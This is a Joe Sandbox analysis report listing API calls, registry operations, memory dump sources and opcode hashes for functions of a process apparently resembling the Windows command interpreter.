                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00F0BC6F
                                                                                                                                                                                                                                                                                                                                                      • calloc.MSVCRT ref: 00F0BCB1
                                                                                                                                                                                                                                                                                                                                                      • calloc.MSVCRT ref: 00F0BD82
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00F0BDCB
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?), ref: 00F0BE1D
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?), ref: 00F0BE3E
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                                                                                                                                                                                                                                                                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 975110957-381716982
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: bcb4cd717cfa758d84b2e98f68e5be4b7a327f66b68c833c7b04a17f8872e352
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ec95e17ba3bfd16b0681e1a9b1aeb60c4e74c857348c9bfc38f9973ec09a7b85
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcb4cd717cfa758d84b2e98f68e5be4b7a327f66b68c833c7b04a17f8872e352
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3C1B072E042199BDB248F68DC41BAEB7B1FF48720F24406DE948E7382DB309D41EB54
                                                                                                                                                                                                                                                                                                                                                      Function 00EEB760 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 286COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _tell.MSVCRT ref: 00EEB7F9
                                                                                                                                                                                                                                                                                                                                                      • _close.MSVCRT ref: 00EEB82C
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EEB8CC
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00EEB936
                                                                                                                                                                                                                                                                                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EEB947
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EEB96D
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                                                                                                                                                                                                                                                                                      • String ID: GOTO
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1380661413-1693823284
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ee890d4c3d88c79697fae7d21fd000b0d64b18b5118dbc6d1bd2f658a3a82e97
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 06275b84ba1bcf5d3c8c06331f3e43d02540dc51f209386a43021af74a7ffe45
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee890d4c3d88c79697fae7d21fd000b0d64b18b5118dbc6d1bd2f658a3a82e97
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21B1F030A0438D8BDB24DF26D94476BB3E5AF84308F24292DE985A7391EB71DC45DB92
                                                                                                                                                                                                                                                                                                                                                      Function 00EE9EF2 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 278COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE9F3A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEA02D
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEA03F
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,00000001,?,00000001), ref: 00EEA0E8
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _get_osfhandlememset
                                                                                                                                                                                                                                                                                                                                                      • String ID: DPATH${
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3784859044-4055172290
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 074aaf9a2f9b9d335b23825939e0e4626a7a786cad3fb252b2cad6a18a5acc57
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: df5b1dc6eded4075161046b70f25b5259ebd544966aedde704acb73dab9b2be1
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 074aaf9a2f9b9d335b23825939e0e4626a7a786cad3fb252b2cad6a18a5acc57
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADA13470A0014D9BC734AF75CC4497AB7E5EF88324B28A66DE556B32D1EB30EC41DB51
                                                                                                                                                                                                                                                                                                                                                      Function 00F06650 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 214registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00F06745
                                                                                                                                                                                                                                                                                                                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 00F067CF
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00F067F6
                                                                                                                                                                                                                                                                                                                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00EE20B8,00000000,00000002,?,00000000), ref: 00F06867
                                                                                                                                                                                                                                                                                                                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 00F068A3
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00F068C5
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseValue$CreateDeleteOpen
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s=%s$\Shell\Open\Command$p~]u
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4081037667-3093970171
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c4cb2bfda53304cbf948d74ad4b971bb67d77c0e441f8ef5a766e95a89c77d23
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: fe6cf67659404a1c3c5e1632dcc64868d3d9722f45caea11b7d315f628e187eb
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4cb2bfda53304cbf948d74ad4b971bb67d77c0e441f8ef5a766e95a89c77d23
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62613871E001299BDF349B24CC49BBBB7F8EF54710F0441A9E849E72C0EA318E51EAA1
                                                                                                                                                                                                                                                                                                                                                      Function 00F07220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • towupper.MSVCRT ref: 00F07277
                                                                                                                                                                                                                                                                                                                                                      • iswalpha.MSVCRT ref: 00F072AA
                                                                                                                                                                                                                                                                                                                                                      • towupper.MSVCRT ref: 00F072BD
                                                                                                                                                                                                                                                                                                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 00F072EF
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F07304
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F07311
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                                                                                                                                                                                                                                                                                                                      • String ID: $%04X-%04X$\
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4001382275-467840296
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9b08af853dcb11a807b2ac36a081a55655a3f05cd2d9bf8f73b404de928ba13b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9a5acdc61b9a61ad7e721ecebb74168126d1b5e4a0d175d0cff164fb7d6f615c
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b08af853dcb11a807b2ac36a081a55655a3f05cd2d9bf8f73b404de928ba13b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A41E872A04354ABE730BBA19C0AFBB73E8EF94B50F04045DF949D61C1E670A941F7A2
                                                                                                                                                                                                                                                                                                                                                      Function 00F064DB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 128registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F0650F
                                                                                                                                                                                                                                                                                                                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00), ref: 00F06545
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F06553
                                                                                                                                                                                                                                                                                                                                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F06590
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F065AD
                                                                                                                                                                                                                                                                                                                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00EE20B8,?,00000000,02000000,?,?,?,00000000,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F065D4
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00F0CD00,00000018,?,?,00EFBFD6), ref: 00F065EF
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s=%s$p~]u
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1019019434-85233260
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9c848cae394e507e0325a15d999345459857ed28f7b6888997a0930f38ea2b18
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 485d9692a5bfcc75a117924bd0812dd066ff4c2c9bf7c19fbc61f0a64f8dd026
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c848cae394e507e0325a15d999345459857ed28f7b6888997a0930f38ea2b18
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6841B272D00269ABDB359B559C09FBF7BB8EB85B60F040119F805B72D4D6264E12FAB0
                                                                                                                                                                                                                                                                                                                                                      Function 00F02D1F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00F03877), ref: 00F02D31
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                                                                                                      • String ID: wil
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 24740636-1589926490
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7aee8a7b3fb474f3e048f16bcf36d0df5939a955471f3d7fef5be74724b62090
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7abbd9ca94d239f8efa4860b0abed7f5529760d542e1f60a31fbb7d1bca28bc3
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7aee8a7b3fb474f3e048f16bcf36d0df5939a955471f3d7fef5be74724b62090
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75319131B45209EBEB609B65CC8CBAB366EEF41361F604035F902DA2D1E774CD42B672
                                                                                                                                                                                                                                                                                                                                                      Function 00F0832A Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 90windowCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,0000000A,?), ref: 00F08360
                                                                                                                                                                                                                                                                                                                                                      • _ultoa.MSVCRT ref: 00F08376
                                                                                                                                                                                                                                                                                                                                                      • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00F0838B
                                                                                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00F083A0
                                                                                                                                                                                                                                                                                                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 00F083D8
                                                                                                                                                                                                                                                                                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 00F0840C
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                                                                                                                                                                                                                                                      • String ID: (#$Application$System
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3377411628-593978566
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3d0018ac9683d476e37ec6de10f48114dcd8a32c76ff2c11bc5cb9c8472fabfb
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ceddd311282348c40cbd3f7f3f1b7db0e220e28b5c13c3d02fca22ca42e5f3ab
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d0018ac9683d476e37ec6de10f48114dcd8a32c76ff2c11bc5cb9c8472fabfb
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E314B71A0020CABDB20DFB5DC45DAEBBB9EB88B50F105129F911E7191EB309A06DF61
                                                                                                                                                                                                                                                                                                                                                      Function 00EF5271 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00EF5294
                                                                                                                                                                                                                                                                                                                                                      • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00EF52A4
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00F01036
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00F01048
                                                                                                                                                                                                                                                                                                                                                      • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00F01064
                                                                                                                                                                                                                                                                                                                                                      • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00EF5134,-00000001), ref: 00F01073
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                                                                                                                                                                                                                                                      • String ID: :$\
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3961617410-1166558509
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5362693ccd7e48176756eea6058e53d9a0e75fa469b5d5309969d6cf1eb9af80
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1846e19eeb69faebbcbcee58ca064a180377043b9b7fda4b11da6ced0aa32d19
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5362693ccd7e48176756eea6058e53d9a0e75fa469b5d5309969d6cf1eb9af80
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11E932A0161CBBD7319B348C489BE77BDEF557647040358EB12F21A0EB708D86F2A2
                                                                                                                                                                                                                                                                                                                                                      Function 00EF161D Relevance: 15.4, APIs: 10, Instructions: 419COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF1665
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF1689
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF16AD
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF16D1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00EF17CF
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00EF17E9
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00EF1801
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00EF1813
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00EF1775,-00000001,-00000001,-00000001,-00000001), ref: 00EF2650
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
